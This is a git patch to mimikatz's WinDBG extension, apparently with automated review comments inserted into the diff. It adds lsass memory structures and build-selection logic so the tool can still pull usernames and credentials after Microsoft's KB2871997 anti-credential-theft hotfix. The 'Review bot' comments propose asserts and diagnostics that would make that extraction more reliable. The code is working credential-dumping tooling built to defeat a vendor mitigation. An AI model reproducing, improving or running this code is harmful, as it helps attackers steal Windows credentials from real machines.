From fbebacc9be067efcd13ef67d36f0d2377803eda0 Mon Sep 17 00:00:00 2001
From: Benjamin DELPY
Date: Sat, 17 May 2014 14:10:59 +0200
Subject: [PATCH] mimilib (WinDBG ext) structures for KB2871997
---
 mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.h | 37 +++++++++++++++++++++
 mimilib/sekurlsadbg/kwindbg.c | 8 +++--
 2 files changed, 43 insertions(+), 2 deletions(-)
diff --git a/mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.h b/mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.h
index 2d25f89..89cedbd 100644
--- a/mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.h
+++ b/mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.h
@@ -125,6 +125,43 @@ typedef struct _KIWI_MSV1_0_LIST_61 {
 PVOID CredentialManager;
 } KIWI_MSV1_0_LIST_61, *PKIWI_MSV1_0_LIST_61;
 
+typedef struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ {
+ struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Flink;
+ struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Blink;
+ PVOID unk0;
+ ULONG unk1;
+ PVOID unk2;
+ ULONG unk3;
+ ULONG unk4;
+ ULONG unk5;
+ HANDLE hSemaphore6;
+ PVOID unk7;
+ HANDLE hSemaphore8;
+ PVOID unk9;
+ PVOID unk10;
+ ULONG unk11;
+ ULONG unk12;
+ PVOID unk13;
+ LUID LocallyUniqueIdentifier;
+ LUID SecondaryLocallyUniqueIdentifier;
+ BYTE waza[12]; /// to do (maybe align) <===================
+ LSA_UNICODE_STRING UserName;
+ LSA_UNICODE_STRING Domaine;
+ PVOID unk14;
+ PVOID unk15;
+ PSID pSid;
+ ULONG LogonType;
+ ULONG Session;
+ LARGE_INTEGER LogonTime; // autoalign x86
+ LSA_UNICODE_STRING LogonServer;
+ PKIWI_MSV1_0_CREDENTIALS Credentials;
+ PVOID unk19;
+ PVOID unk20;
+ PVOID unk21;
+ ULONG unk22;
+ PVOID CredentialManager;
+} KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, *PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ;
+
 typedef struct _KIWI_MSV1_0_LIST_62 {
 struct _KIWI_MSV1_0_LIST_62 *Flink;
 struct _KIWI_MSV1_0_LIST_62 *Blink;
diff --git a/mimilib/sekurlsadbg/kwindbg.c b/mimilib/sekurlsadbg/kwindbg.c
index b077884..3444f48 100644
--- a/mimilib/sekurlsadbg/kwindbg.c
+++ b/mimilib/sekurlsadbg/kwindbg.c
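Review bot: The 12-byte `waza` placeholder in KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ is marked "to do (maybe align)", yet every field after it (UserName, Domaine, pSid, Credentials, CredentialManager) is located in lsass memory at the offset this guess produces, so a wrong size or an x86/x64 alignment difference shifts all of them silently instead of failing loudly. The struct is only consumed through sizeof/FIELD_OFFSET in the helper table, so nothing checks the layout at build time either. I'd replace the marker with a comment that records where the layout was recovered from and on which architecture it was verified, e.g. `BYTE waza[12]; // unknown region in post-KB2871997 lsasrv (LogonSessionLeakList builds); offsets verified on <arch>/<lsasrv version> - TODO: confirm on the other architecture before trusting the UserName/Credentials offsets`. If reference offsets for a known build are at hand, a `C_ASSERT(FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, UserName) == <known offset>)` next to the typedef would turn a bad guess into a compile error rather than garbage output.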
@@ -75,6 +75,7 @@ KUHL_M_SEKURLSA_PACKAGE packages[] = {
 const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
 {sizeof(KIWI_MSV1_0_LIST_60), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, CredentialManager)},
 {sizeof(KIWI_MSV1_0_LIST_61), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, CredentialManager)},
+ {sizeof(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, CredentialManager)},
 {sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, CredentialManager)},
 {sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager)},
 };
@@ -93,9 +94,12 @@ DECLARE_API(mimikatz)
 else if(NtBuildNumber < KULL_M_WIN_MIN_BUILD_8)
 helper = &lsassEnumHelpers[1];
 else if(NtBuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
- helper = &lsassEnumHelpers[2];
- else
 helper = &lsassEnumHelpers[3];
+ else
+ helper = &lsassEnumHelpers[4];
+
+ if((NtBuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (NtBuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (GetExpression("lsasrv!LogonSessionLeakList")))
+ helper++; // yeah, really, I do that =)
 
 pInitializationVector = GetExpression("lsasrv!InitializationVector");
 phAesKey = GetExpression("lsasrv!hAesKey");
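Review bot: Inserting the KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ entry at position 2 makes the order of lsassEnumHelpers load-bearing: the selection code in the following hunk addresses the table by literal index and relies on `helper++` to step from the LIST_61 entry to this one when lsasrv!LogonSessionLeakList resolves, and the same increment moves whatever build lands on the LIST_62 entry onto LIST_63. Nothing on the array itself says so, so a later insertion or reorder would pick the wrong struct for parsing lsass memory without any error. I'd put a comment above the array, `// order is significant: DECLARE_API(mimikatz) selects an entry by build number and does helper++ when lsasrv!LogonSessionLeakList exists (KB2871997), so a post-hotfix layout must directly follow its pre-hotfix one`; named indices (an enum) would make the coupling explicit if the table grows again.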
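Review bot: The hotfix detection at the `helper++` line silently falls back to the pre-KB2871997 layout whenever `GetExpression("lsasrv!LogonSessionLeakList")` returns 0, which also happens when lsasrv symbols simply failed to load, so on a patched target with bad symbols the extension parses lsass with the wrong struct and the offset-dependent fields (UserName, Credentials, CredentialManager) come out as garbage with no hint why. Because the increment is applied to every build between KULL_M_WIN_MIN_BUILD_7 and KULL_M_WIN_MIN_BUILD_BLUE, a target on the LIST_62 entry (presumably Windows 8) moves to LIST_63 rather than to the new ANTI_MIMIKATZ struct; if that is intended it deserves saying. I'd replace the joke comment with one stating the invariant, `helper++; // KB2871997 layout must sit directly after the pre-hotfix entry in lsassEnumHelpers (LIST_61 -> LIST_61_ANTI_MIMIKATZ, LIST_62 -> LIST_63)`, and print the selected entry index and whether the symbol resolved (the extension's `dprintf`, if this file already uses it) before the lsasrv lookups that follow, so an operator can tell a silent fallback from a real pre-hotfix system. The rest of DECLARE_API(mimikatz) is outside this hunk.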